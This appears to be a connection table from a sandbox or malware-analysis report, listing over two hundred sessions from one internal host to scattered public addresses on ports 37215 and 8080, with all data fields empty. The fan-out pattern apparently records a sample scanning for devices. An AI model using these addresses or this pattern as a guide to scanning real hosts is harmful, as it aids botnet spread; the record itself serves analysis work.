                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28747192.168.2.236060641.61.165.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28748192.168.2.235116241.8.193.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28749192.168.2.234204295.177.246.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28750192.168.2.2347016197.27.169.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28751192.168.2.2346110197.241.5.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28752192.168.2.2342926157.146.96.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28753192.168.2.2357078208.65.132.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28754192.168.2.2342628157.153.31.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28755192.168.2.2344244195.164.149.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28756192.168.2.2339532157.196.241.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28757192.168.2.2352240197.115.164.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28758192.168.2.2359386157.209.103.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28759192.168.2.2346996157.60.196.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28760192.168.2.2350566157.103.19.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28761192.168.2.2345954114.36.153.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28762192.168.2.2340520101.17.117.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28763192.168.2.235398041.251.240.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28764192.168.2.2360942157.221.85.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28765192.168.2.2360900197.196.69.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28766192.168.2.2336546157.246.243.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28767192.168.2.234797635.151.126.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28768192.168.2.234063841.46.29.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28769192.168.2.2359974159.165.57.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28770192.168.2.234819246.171.254.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28771192.168.2.236027441.169.86.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28772192.168.2.2356542197.68.132.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28773192.168.2.2339396197.74.153.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28774192.168.2.2346380197.184.17.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28775192.168.2.2352744157.115.36.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28776192.168.2.2345434197.155.123.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28777192.168.2.2345564157.206.151.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28778192.168.2.2358504197.68.250.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28779192.168.2.233569413.199.48.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28780192.168.2.2335584157.206.25.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28781192.168.2.234073641.140.196.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28782192.168.2.2343400157.180.203.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28783192.168.2.2360754157.208.56.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28784192.168.2.2349034157.30.233.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28785192.168.2.2343508197.159.247.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28786192.168.2.235787641.43.136.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28787192.168.2.2353314197.45.178.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28788192.168.2.235228041.144.179.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28789192.168.2.234812641.45.78.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28790192.168.2.233995241.93.36.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28791192.168.2.235064241.224.5.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28792192.168.2.2353944197.37.179.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28793192.168.2.2346570129.88.34.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28794192.168.2.2333116218.188.31.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28795192.168.2.2341346193.114.191.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28796192.168.2.2354762197.166.183.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28797192.168.2.2346222197.170.72.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28798192.168.2.235409841.221.91.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28799192.168.2.2346460157.4.250.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28800192.168.2.233447841.48.242.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28801192.168.2.2334446157.191.32.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28802192.168.2.2341920197.104.122.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28803192.168.2.2348552157.103.60.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28804192.168.2.2347444157.251.43.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28805192.168.2.233432641.159.164.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28806192.168.2.2352462197.92.237.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28807192.168.2.236072241.141.224.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28808192.168.2.2358194197.155.196.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28809192.168.2.2360132157.205.191.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28810192.168.2.235672481.150.108.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28811192.168.2.2345310197.205.222.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28812192.168.2.2341024105.220.70.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28813192.168.2.2346878197.41.134.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28814192.168.2.2341370197.228.123.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28815192.168.2.2353006166.224.53.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28816192.168.2.235448441.237.164.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28817192.168.2.2343312157.231.54.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28818192.168.2.235045641.151.88.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28819192.168.2.2338090157.210.187.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28820192.168.2.2340900114.243.30.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28821192.168.2.235863017.85.86.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28822192.168.2.2349474107.240.232.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28823192.168.2.2338972142.67.44.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28824192.168.2.235160040.249.100.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28825192.168.2.2352084193.97.210.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28826192.168.2.235185895.200.234.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28827192.168.2.2356360191.55.63.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28828192.168.2.235367447.146.244.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28829192.168.2.2333900213.78.113.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28830192.168.2.2358180209.157.185.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28831192.168.2.233725677.66.166.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28832192.168.2.2334066152.133.131.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28833192.168.2.235274034.19.101.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28834192.168.2.2333490111.246.240.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28835192.168.2.233645420.39.97.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28836192.168.2.234765298.123.56.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28837192.168.2.2353692162.255.180.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28838192.168.2.2343200212.28.213.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28839192.168.2.234595445.59.168.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28840192.168.2.2358612137.166.114.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28841192.168.2.234493245.255.144.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28842192.168.2.233478058.162.230.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28843192.168.2.2335466190.94.150.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28844192.168.2.2340684194.105.80.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28845192.168.2.2347122132.236.184.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28846192.168.2.2336232178.195.78.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28847192.168.2.2348734108.201.151.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28848192.168.2.2349744152.192.197.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28849192.168.2.235592018.236.43.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28850192.168.2.2349222163.232.226.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28851192.168.2.2333956194.33.76.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28852192.168.2.233334486.161.205.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28853192.168.2.2334824151.1.25.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28854192.168.2.2345532171.37.236.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28855192.168.2.2343966121.208.119.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28856192.168.2.2339650152.243.49.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28857192.168.2.234141264.63.37.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28858192.168.2.2335706152.26.79.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28859192.168.2.234337850.250.7.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28860192.168.2.235923652.243.102.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28861192.168.2.2335758133.80.247.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28862192.168.2.2350040180.253.107.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28863192.168.2.235729813.241.239.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28864192.168.2.2334252135.142.252.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28865192.168.2.2346930191.116.196.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28866192.168.2.2340766212.11.229.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28867192.168.2.235736467.215.248.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28868192.168.2.2338168212.114.193.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28869192.168.2.2357920164.252.230.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28870192.168.2.2340156117.113.190.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28871192.168.2.2355294219.179.186.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28872192.168.2.234866692.34.223.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28873192.168.2.233621227.77.113.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28874192.168.2.234103484.249.28.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28875192.168.2.2355516145.104.65.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28876192.168.2.235193437.124.19.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28877192.168.2.234418482.204.109.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28878192.168.2.234544848.1.57.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28879192.168.2.234517643.232.52.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28880192.168.2.2344074219.35.205.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28881192.168.2.2352414126.153.85.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28882192.168.2.2346104202.41.71.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28883192.168.2.233527884.2.78.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28884192.168.2.234216459.5.230.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28885192.168.2.234687442.208.72.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28886192.168.2.2353748150.60.87.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28887192.168.2.2350944108.13.213.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28888192.168.2.2340120164.93.117.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28889192.168.2.234138485.172.225.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28890192.168.2.2346826135.177.216.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28891192.168.2.2342728222.124.172.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28892192.168.2.234329480.168.39.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28893192.168.2.23384529.123.20.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28894192.168.2.2338522205.140.135.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28895192.168.2.2339290197.129.184.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28896192.168.2.2333548105.224.241.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28897192.168.2.2360896165.45.219.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28898192.168.2.2357450102.162.126.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28899192.168.2.235374897.44.165.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28900192.168.2.235983032.225.212.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28901192.168.2.2339234116.238.19.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28902192.168.2.233907254.192.21.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28903192.168.2.233926088.75.189.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28904192.168.2.2349258217.200.68.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28905192.168.2.2350298134.140.171.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28906192.168.2.2337972204.239.171.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28907192.168.2.2359568133.22.107.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28908192.168.2.234285076.82.98.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28909192.168.2.2346146121.252.120.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28910192.168.2.235036039.87.99.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28911192.168.2.2357798121.47.208.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28912192.168.2.233419469.31.180.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28913192.168.2.2351994175.203.48.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28914192.168.2.2353134130.8.26.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28915192.168.2.2343542130.42.245.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28916192.168.2.234943048.12.65.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28917192.168.2.2358320119.27.42.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28918192.168.2.234428872.80.198.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28919192.168.2.2335854208.12.129.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28920192.168.2.235965636.103.184.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28921192.168.2.233449699.84.206.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28922192.168.2.234617894.31.107.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28923192.168.2.233970070.222.227.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28924192.168.2.2351462184.135.70.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28925192.168.2.233787462.102.76.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28926192.168.2.2347126202.49.156.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28927192.168.2.2360678121.104.98.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28928192.168.2.2360378103.47.208.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28929192.168.2.233938227.179.252.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28930192.168.2.2338888170.154.15.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28931192.168.2.235712863.0.65.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28932192.168.2.23543349.196.137.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28933192.168.2.2360368187.32.108.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28934192.168.2.2359436160.249.106.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28935192.168.2.2357324152.12.90.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28936192.168.2.235837861.30.167.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28937192.168.2.2338616183.255.145.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28938192.168.2.235564899.247.43.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28939192.168.2.23595501.198.144.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28940192.168.2.233442457.66.165.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28941192.168.2.2357076217.15.253.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28942192.168.2.2336416216.45.91.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28943192.168.2.234850653.75.210.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28944192.168.2.233511612.114.233.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28945192.168.2.2358694210.170.77.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28946192.168.2.2347842109.162.32.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28947192.168.2.2358884163.60.140.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28948192.168.2.2345152164.58.153.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28949192.168.2.2335684197.142.44.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28950192.168.2.2342430193.72.90.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28951192.168.2.2347730211.134.2.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28952192.168.2.2353964147.2.80.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28953192.168.2.2345226147.202.245.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28954192.168.2.234422613.160.37.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28955192.168.2.2337154176.56.100.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28956192.168.2.234626047.126.160.1428080
                                                        TimestampBytes transferredDirectionData


